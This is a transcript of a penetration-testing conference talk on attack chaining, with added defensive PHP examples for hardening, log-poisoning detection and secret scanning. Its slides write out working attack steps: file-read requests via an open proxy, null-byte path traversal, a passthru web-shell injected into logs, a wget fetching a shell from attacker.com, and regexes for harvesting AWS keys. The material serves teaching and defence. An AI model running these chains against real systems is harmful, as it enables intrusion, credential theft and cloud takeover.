Attack Chaining: Advanced Maneuvers for Hack Fu

Just as a good chess player thinks five moves ahead, a great penetration tester should be able to visualize their attack in order to compromise high-value targets. This presentation will explore how a penetration tester can learn to leverage attack chaining for maximum impact. A penetration test is supposed to be a simulation of a real-world attack. Real-world attackers do not use expensive automated tools or a checklist. Nor do they use a single technique or exploit to compromise a target. More commonly they combine several techniques, vulnerabilities, and exploits to create a “chained” attack that achieves a malicious goal. Chained attacks are far more complex and far more difficult to defend against. We want to explore how application vulnerabilities relate to one another and build a mind map that guides penetration testers through various attack scenarios. Prepare to be blown away on this roller coaster ride with real-world examples of massive compromises. If you are not a thrill seeker, this presentation may leave you a bit queasy.

Transcript

  • 1. Attack Chaining: Advanced Maneuvers for Hack Fu. OWASP ATL, 31 May 2012
  • 2. About Us. WHO ARE THESE DUDES? Rob, Sr. Security Associate @ Stach & Liu. Oscar, Security Associate @ Stach & Liu
  • 3. Penetration Test vs. Vulnerability Assessment
  • 4. vs.
  • 5. "Simulate a real world attack against a target network or application." - EVERYBODY
  • 6. It answers the question, "could someone break in?"
  • 7. Penetration Testing (phase diagram): 1 Information Gathering → 2 Exploit & Penetrate → 3 Escalate Privileges → 4a Maintain Access / 4b Deny Access
  • 8. Pen Testing Scenario
    • Web application penetration test
    • Cloud-based infrastructure hosts multiple sites
    • Out-sourced PHP development to many contractors
    • Determine attacker's ability to compromise PII or infrastructure
  • 9. Step 1 – Explore
  • 10. Step 2 – Read Code. http://vuln.com/dir/share.js ... AJAX.Call({ method:'POST', url:'include/s_proxy.php' ...
  • 11. Step 3 – Proxy? http://vuln.com/dir/include/s_proxy.php?redirect_url=http://www.google.com
  • 12. Step 4 – Read Local Files! http://vuln.com/dir/include/s_proxy.php?redirect_url=file:///etc/passwd
  • 13. Attack Chaining – Maneuver 1
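The s_proxy.php endpoint of Steps 3 and 4 fetches whatever URL the redirect_url parameter names, which is why a file:// URL returned /etc/passwd. The following is an added example of a hardened version of that endpoint; it is not code from the presentation or from the application it describes. The allowlisted host names, the HTTPS-only rule and the curl options are assumptions made for the demo.

```php
<?php
// Added example (not from the slides): a hardened replacement for the
// s_proxy.php "redirect_url" fetcher of Steps 3-4. The original accepted any
// URL, so file:///etc/passwd was read and echoed back to the client.
// Assumption: the proxy only ever needs a fixed set of hosts over HTTPS,
// listed in ALLOWED_HOSTS (hypothetical names).

const ALLOWED_HOSTS = ['api.example-partner.com', 'cdn.example.com'];

/**
 * Return the URL if it is safe to fetch, or null (with $reason set) otherwise.
 */
function validate_proxy_url(string $url, ?string &$reason = null): ?string
{
    // Reject embedded NULs and control characters before parsing anything.
    if (preg_match('/[\x00-\x1f\x7f]/', $url)) {
        $reason = 'control character in URL';
        return null;
    }
    $parts = parse_url($url);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        $reason = 'unparseable or relative URL';
        return null;
    }
    // Only plain HTTPS: this blocks file://, php://, ftp://, gopher:// etc.
    if (strtolower($parts['scheme']) !== 'https') {
        $reason = 'scheme not allowed: ' . $parts['scheme'];
        return null;
    }
    // user:pass@host forms are never legitimate for this endpoint.
    if (isset($parts['user']) || isset($parts['pass'])) {
        $reason = 'credentials in URL';
        return null;
    }
    // Exact host allowlist: an open proxy is a server-side request primitive.
    $host = strtolower($parts['host']);
    if (!in_array($host, ALLOWED_HOSTS, true)) {
        $reason = 'host not in allowlist: ' . $host;
        return null;
    }
    // Belt and braces: even an allowlisted name must not resolve to a private
    // or reserved address (loopback, RFC 1918, link-local metadata services).
    $ips = gethostbynamel($host);
    if ($ips === false) {
        $reason = "$host does not resolve";
        return null;
    }
    foreach ($ips as $ip) {
        if (filter_var($ip, FILTER_VALIDATE_IP,
                FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) === false) {
            $reason = "$host resolves to non-public address $ip";
            return null;
        }
    }
    return $url;
}

// Request handling: fail closed, log the rejection, never echo the input back.
$raw = $_GET['redirect_url'] ?? '';
$target = validate_proxy_url(is_string($raw) ? $raw : '', $reason);
if ($target === null) {
    http_response_code(400);
    error_log('s_proxy rejected request: ' . $reason);
    exit;
}
$ch = curl_init($target);
curl_setopt_array($ch, [
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_FOLLOWLOCATION => false,          // a redirect could point inward
    CURLOPT_PROTOCOLS      => CURLPROTO_HTTPS, // curl enforces the scheme too
    CURLOPT_TIMEOUT        => 5,
]);
$body = curl_exec($ch);
curl_close($ch);
header('Content-Type: text/plain; charset=utf-8');
echo $body === false ? '' : $body;
```

The DNS check is a time-of-check/time-of-use window (the name can be re-pointed between the lookup and the fetch); pinning the resolved address with CURLOPT_RESOLVE closes it. The simplest fix for the scenario on the slides is still to not expose a generic fetch-by-URL endpoint at all, and the error_log() call gives the blue team a signal when someone probes it.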
  • 15. Step 5 – Gather More Info. http://vuln.com/dir/include/s_proxy.php?redirect_url=file:///etc/httpd/conf/httpd.conf
  • 16. Step 6 – Keep Going… http://vuln.com/dir/include/s_proxy.php?redirect_url=file:///etc/httpd/conf/virtual.conf
  • 17. Step 6 – Keep Going… http://vuln.com/dir/include/s_proxy.php?redirect_url=file:///etc/httpd/conf/virtual.conf
    <VirtualHost *>
        ServerName vuln.com
        DocumentRoot /var/www/sites/vuln.com/docroot
        ErrorLog logs/vuln.com_error_log
    </VirtualHost>
  • 18. Step 7 – Back to DirBuster
  • 19. Step 8 – Review Code. http://vuln.com/dir/include/s_proxy.php?redirect_url=file:///var/www/sites/vuln.com/docroot/dir/include/controller.php
  • 20. Step 8 – Review Code. http://vuln.com/dir/include/s_proxy.php?redirect_url=file:///var/www/sites/vuln.com/docroot/dir/include/controller.php
    <?php
    require_once('includes/config.php');
    $module = !empty($_REQUEST['module']) ? $_REQUEST['module'] : $config['module'];
    $action = !empty($_REQUEST['action']) ? $_REQUEST['action'] : $config['action'];
    $currentModuleFile = 'modules/' . $module . '/' . $action . '.php';
    include($currentModuleFile);
    exit;
    ?>
  • 21. Attack Chaining – Maneuver 2
  • 23. Step 9 – Null Byte Injection. http://vuln.com/dir/include/controller.php?module=../../../../../../etc/passwd%00
  • 24. Step 8 – Review Code (the controller.php from slide 20, shown again: the include path that the null byte truncates)
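The controller.php on slide 20 builds an include path from request parameters with no validation, which is the Local File Include that Step 9's null byte and Step 14's poisoned log turn into command execution. The following is an added example of a hardened rewrite of that routine; it is not code from the presentation or from the assessed application. The module and action names, the modules directory layout and the ROUTES table are assumptions for the demo.

```php
<?php
// Added example, not from the slides: a hardened rewrite of the controller.php
// include logic shown on slide 20. The original built
//     'modules/' . $module . '/' . $action . '.php'
// straight from $_REQUEST and include()d it. Assumption: the set of modules
// and actions is small and known, so it is listed explicitly; the names
// below are hypothetical.

const MODULES_DIR = __DIR__ . '/modules';
const ROUTES = [
    'home'    => ['index', 'about'],
    'account' => ['login', 'logout', 'profile'],
];

/**
 * Resolve a requested module/action pair to a file under MODULES_DIR.
 * Returns null on any doubt; every check fails closed.
 *
 * @param mixed $module raw request value (string, null, or anything else)
 * @param mixed $action raw request value
 */
function resolve_module_file($module, $action): ?string
{
    // Defaults come from configuration, never from the request.
    $module = $module ?? 'home';
    $action = $action ?? 'index';
    // Arrays (?module[]=x) and other non-strings are rejected outright.
    if (!is_string($module) || !is_string($action)) {
        return null;
    }
    // 1. Syntactic allowlist: one short lowercase identifier. This alone rules
    //    out "../", "/", absolute paths and the %00 NUL byte of Step 9.
    foreach ([$module, $action] as $name) {
        if (!preg_match('/\A[a-z][a-z0-9_]{0,31}\z/', $name)) {
            return null;
        }
    }
    // 2. Semantic allowlist: the pair must be a route the application ships.
    if (!array_key_exists($module, ROUTES) || !in_array($action, ROUTES[$module], true)) {
        return null;
    }
    // 3. Canonical-path check as a second line of defence: the resolved file
    //    must exist and still sit below MODULES_DIR after symlink resolution.
    $base = realpath(MODULES_DIR);
    $path = realpath(MODULES_DIR . '/' . $module . '/' . $action . '.php');
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Read $_GET deliberately; $_REQUEST also merges cookies, widening the input.
$reqModule = $_GET['module'] ?? '';
$reqAction = $_GET['action'] ?? '';
$file = resolve_module_file($_GET['module'] ?? null, $_GET['action'] ?? null);
if ($file === null) {
    http_response_code(404);
    // Log the rejection for detection, URL-encoded so that the log line itself
    // can never carry a payload the way the Referer did on slide 30.
    error_log(sprintf('controller: rejected module=%s action=%s from %s',
        rawurlencode(is_string($reqModule) ? $reqModule : gettype($reqModule)),
        rawurlencode(is_string($reqAction) ? $reqAction : gettype($reqAction)),
        $_SERVER['REMOTE_ADDR'] ?? '?'));
    exit;
}
require $file;
```

The explicit ROUTES table is the check that actually matters; the identifier regex and the realpath() prefix test are there so that a later "just loosen the allowlist" change still cannot reach the error log or /etc/passwd.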
  • 25. Step 10 – Review Gathered Info. http://vuln.com/dir/include/s_proxy.php?redirect_url=file:///etc/httpd/conf/virtual.conf
  • 26. Step 10 – Back to Virtual Conf. http://vuln.com/dir/include/s_proxy.php?redirect_url=file:///etc/httpd/conf/virtual.conf
    <VirtualHost *>
        ServerName vuln.com
        DocumentRoot /var/www/sites/vuln.com/docroot
        ErrorLog logs/vuln.com_error_log
    </VirtualHost>
  • 27. Step 11 – Where To Stick It? http://vuln.com/dir/include/s_proxy.php?redirect_url=file:///etc/httpd/logs/vuln.com_error_log
    [error] [client 10.10.65.18] File does not exist: /var/www/sites/vuln.com/docroot/wp-content/themes/lulzcat.jpg, referer: http://www.vuln.com/
  • 28. Step 12 – Poison Logs
  • 30. Step 12 – Poison Logs (the PHP placed in the Referer header so that Apache writes it into the error log)
    <? echo "<pre>"; passthru($_GET['cmd']); echo "</pre>"; ?>
  • 31. Step 13 – PHP in the Log. http://vuln.com/dir/include/s_proxy.php?redirect_url=file:///etc/httpd/logs/vuln.com_error_log
    [error] [client 10.10.65.18] File does not exist: /var/www/sites/vuln.com/docroot/wp-content/themes/lulzcat.jpg, referer: http://www.vuln.com/
  • 32. Step 13 – PHP in the Log. http://vuln.com/dir/include/s_proxy.php?redirect_url=file:///etc/httpd/logs/vuln.com_error_log
    [error] [client 10.10.65.18] File does not exist: /var/www/sites/vuln.com/docroot/wp-content/themes/lulzcat.jpg, referer: http://www.vuln.com/
    [error] [client 10.10.65.18] File does not exist: /var/www/sites/vuln.com/docroot/wp-content/themes/lulzcat-attack.jpg, referer: <? echo <pre>;passthru( $_GET[cmd]);echo <pre>; ?>
  • 33. Step 14 – Execute Code. http://vuln.com/dir/include/controller.php?module=/../../../../../../../../etc/httpd/logs/vuln.com_error_log%00&cmd=ls;
    /var/www/sites/vuln.com/docroot/wp-content/themes/lulzcat-attack.jpg, referer:
    controller.php example.php includes modules phpinfo.php …
  • 34. Step 14 – Execute Code (what the included log line evaluates to)
    <? echo "<pre>"; passthru('ls'); echo "</pre>"; ?>
    /var/www/sites/vuln.com/docroot/wp-content/themes/lulzcat-attack.jpg, referer:
    controller.php example.php includes modules phpinfo.php …
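Steps 12 to 14 work because the poisoned Referer sits in a log file the application can be made to include. Besides fixing the include, a defender wants to notice the poisoning attempt itself. The following is an added example, not from the presentation, of a small scanner that reads Apache error-log lines and flags entries whose client-supplied fields carry a PHP open tag or a command-execution function; the three log lines are constructed for the demo from the format shown on slide 32, and the pattern names are my own.

```php
<?php
// Added example, not from the slides: a detector for the log-poisoning
// pattern of Steps 12-14, meant to run over the Apache error log from cron or
// a log shipper. It flags entries whose attacker-controlled tail (request path,
// referer) contains a PHP open tag or a command-execution function name.
// SAMPLE_LOG is constructed for the demo, modelled on slide 32.

const SAMPLE_LOG = <<<'LOG'
[error] [client 10.10.65.18] File does not exist: /var/www/sites/vuln.com/docroot/wp-content/themes/lulzcat.jpg, referer: http://www.vuln.com/
[error] [client 10.10.65.18] File does not exist: /var/www/sites/vuln.com/docroot/wp-content/themes/lulzcat-attack.jpg, referer: <? echo <pre>;passthru( $_GET[cmd]);echo <pre>; ?>
[error] [client 10.10.65.19] File does not exist: /var/www/sites/vuln.com/docroot/favicon.ico, referer: http://www.vuln.com/about
LOG;

/** Things that have no business in a referer or a requested path. */
const POISON_PATTERNS = [
    'php_open_tag'  => '/<\?(?:php|=)?/i',
    'exec_function' => '/\b(?:passthru|system|shell_exec|exec|popen|proc_open|eval)\s*\(/i',
    'superglobal'   => '/\$_(?:GET|POST|REQUEST|COOKIE)\b/',
];

/**
 * Return one finding per suspicious line: [line number, client IP, rule names].
 */
function scan_error_log(string $log): array
{
    $findings = [];
    foreach (explode("\n", $log) as $i => $line) {
        if ($line === '') {
            continue;
        }
        $client = preg_match('/\[client ([^\]]+)\]/', $line, $m) ? $m[1] : 'unknown';
        // Only the part after Apache's own message is client-controlled: the
        // missing path and the referer. Fall back to the whole line otherwise.
        $tail = strstr($line, 'File does not exist:') ?: $line;
        $hits = [];
        foreach (POISON_PATTERNS as $name => $re) {
            if (preg_match($re, $tail)) {
                $hits[] = $name;
            }
        }
        if ($hits) {
            $findings[] = [$i + 1, $client, $hits];
        }
    }
    return $findings;
}

foreach (scan_error_log(SAMPLE_LOG) as [$no, $client, $hits]) {
    printf("ALERT line %d client %s: %s\n", $no, $client, implode(',', $hits));
}
```

Run against the sample, only the second line is reported, with all three rules firing. The same patterns applied to the access log (User-Agent and Referer fields) cover the other usual poisoning channel, and the client address gives incident response a pivot: on the slides every poisoned line came from 10.10.65.18.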
  • 35. Attack Chaining – Maneuver 3
  • 37. Step 15 – Upload Shell. http://vuln.com/dir/include/controller.php?module=/../../../../../../../../etc/httpd/logs/vuln.com_error_log%00&cmd=wget%20http://attacker.com/gny.php;
  • 38. Step 16 – Enjoy!
  • 39. Step 17 – I want more! (regular expressions used to grep the code base for Amazon credentials)
    ec2[^d]["][A-Z0-9]{20}["]
    ec2.*["][A-Z0-9]{20}["] ["][A-Za-z0-9+/]{40}["]
    ec2.*["][A-Z0-9]{20}["]
    ec2(D)*["][A-Z0-9]{20}["]
    amazon.*["][A-Z0-9]{20}["]
    (amazon|ec2).*["][A-Z0-9]{20}["]
    amazon(D)*["][A-Z0-9]{20}["]
    access secret ["][A-Z0-9]{20}["] [A-Za-z0-9+/]{40}
    amazon.*["][A-Z0-9]{20}["].*["][A-Za-z0-9+/]{40}["]
    aws.*["][A-Z0-9]{20}["] ["][A-Za-z0-9+/]{40}["]
    amazon.*["][A-Z0-9]{20}["] ["][A-Za-z0-9+/]{40}["]
    secret.*["][A-Za-z0-9+/]{40}["]
    ["][A-Za-z0-9+/]{40}["].*amazon
  • 40. Step 18 – Amazon AWS Regex (hits in the code base)
    $this->amazonService = new Zend_Service_Amazon('DB3BAD768F2F11C7628',
    $aws_key = '8AFB5AF55D1E6620EE1';
    define('AMAZON_KEY', '372B8E408D1484C538F');
    if (!defined('awsAccessKey')) define('awsAccessKey', '9F6EB7471C926194884');
    //if (!defined('awsAccessKey')) define('awsAccessKey', '4CAD89B86344CD8C26C');
    define('AMAZON_AES_ACCESS_KEY_ID', '95C95B8DC84AA24C0EC');
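The regexes on slide 39 are just as useful on the defending side: run over the repository before code ships, they catch the hardcoded keys of slide 40 before an attacker with file-read access does. The following is an added example, not from the presentation, of that check written as a pre-commit or CI scanner; the two patterns are my own consolidation of the slide-39 style (an AWS-related word near a quoted 20-character ID, or near a quoted 40-character secret), the sample files are constructed, and the key-like strings are fakes of the right shape, not real credentials.

```php
<?php
// Added example, not from the slides: a defender-side secret scanner in the
// spirit of the slide-39 patterns, meant for a pre-commit hook or CI step so
// hardcoded Amazon credentials never reach a server where an LFI can read
// them (Steps 17-18). SAMPLE_FILES is constructed; the keys are fakes.

/**
 * Keyword match is case-insensitive (slide 40 shows both AMAZON_KEY and
 * awsAccessKey); the key material itself keeps the slide's strict classes.
 */
const KEY_PATTERNS = [
    'aws_access_key_id' => '/(?i:aws|amazon|ec2)\w*.{0,40}?["\'][A-Z0-9]{20}["\']/',
    'aws_secret_key'    => '/(?i:secret|aws|amazon)\w*.{0,40}?["\'][A-Za-z0-9+\/]{40}["\']/',
];

/** One file with hardcoded keys, one that reads them from the environment. */
const SAMPLE_FILES = [
    'config.php' =>
        "<?php\n" .
        "define('AMAZON_KEY', 'AKIAEXAMPLEKEY000000');\n" .
        "define('AMAZON_SECRET', 'abcdefghijklmnopqrstuvwxyz0123456789ABCD');\n",
    'Service.php' =>
        "<?php\n" .
        "\$this->amazonService = new Zend_Service_Amazon(getenv('AWS_KEY'), getenv('AWS_SECRET'));\n",
];

/**
 * Scan filename => contents pairs and return one finding per hit as
 * [file, line number, rule]. The matched value is deliberately not returned,
 * so the scanner's own output cannot leak a secret into CI logs.
 */
function scan_for_secrets(array $files): array
{
    $findings = [];
    foreach ($files as $name => $content) {
        foreach (explode("\n", $content) as $i => $line) {
            foreach (KEY_PATTERNS as $rule => $re) {
                if (preg_match($re, $line)) {
                    $findings[] = [$name, $i + 1, $rule];
                }
            }
        }
    }
    return $findings;
}

$findings = scan_for_secrets(SAMPLE_FILES);
foreach ($findings as [$file, $line, $rule]) {
    fprintf(STDERR, "%s:%d: possible hardcoded credential (%s)\n", $file, $line, $rule);
}
// A non-zero exit makes the hook or CI job fail whenever anything was found.
exit($findings ? 1 : 0);
```

On the sample it reports config.php lines 2 and 3 and nothing for Service.php, which is the shape the fix should take: credentials come from the environment or an instance role, and the keys that do exist are scoped to the one service they need rather than the EC2 administrator rights of slide 43.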
  • 41. Step 19 – AWS Takeover
  • 42. Step 20 – Make It Your Own
  • 43. Cost of Amazon Cloud Compromise. CRITICAL EXPOSURE
    1. Found 8 Amazon Secret Keys to access Amazon S3
    2. Found that 2 of the 8 have administrator access to Amazon EC2
    3. Attacker launches 100 Extra Large Clusters: $1,049,000
  • 44. Take Them Off The Web. CRITICAL EXPOSURE
    1. Found 8 Amazon Secret Keys to access Amazon S3
    2. Found that 2 of the 8 have administrator access to Amazon EC2
    3. Attacker shuts down and deletes all servers and backups permanently: PRICELESS
  • 45. Attack Chaining – Hack Fu
  • 47. Why Is This Happening?
    1. Local File Include (file read only; code execution)
    2. Null Byte Injection
    3. Log Poisoning
    4. Insecure Credential Storage
    5. Overly Permissive Amazon AWS Keys
    6. Sensitive Information Disclosure
  • 48. Web → Mass Malware Deployment
  • 49. Web → Data Center Compromise
  • 50. Web → Internal Network Compromise
  • 51. Internal Assessment → SSN & Bank #'s
  • 52. Infrastructure Review
  • 53. Step 1 – Target Wireless
  • 55. Step 2 – Port Scan
  • 56. Step 3 – Test Default Creds
  • 57. Infrastructure Apocalypse
  • 58. Step 4 – Control AP
  • 59. Step 5 – Read All E-mail
  • 60. Step 6 – Listen To VOIP
  • 61. Step 7 – Open All Doors
  • 64. Step 7 – Server Room Door
  • 65. Is This Real Life?
    1. Insecure Wireless Encryption
    2. Improper Network Segmentation
    3. Insecure Default Configuration
    4. Weak Passwords
    5. Sensitive Information Disclosure
  • 66. Protection – How?
    1. People
    2. Policy
    3. Processes
    4. Strategic / Tactical Security
    5. Defense In-Depth
  • 67. Defense In-Depth IS PROTECTION AGAINST...
  • 68. How Do You Get Better?
  • 69. Synthesis and Patterns CAN BE BOTH GOOD AND BAD
  • 70. Attack Visualization LIKE BOBBY FISCHER
  • 71. Thank You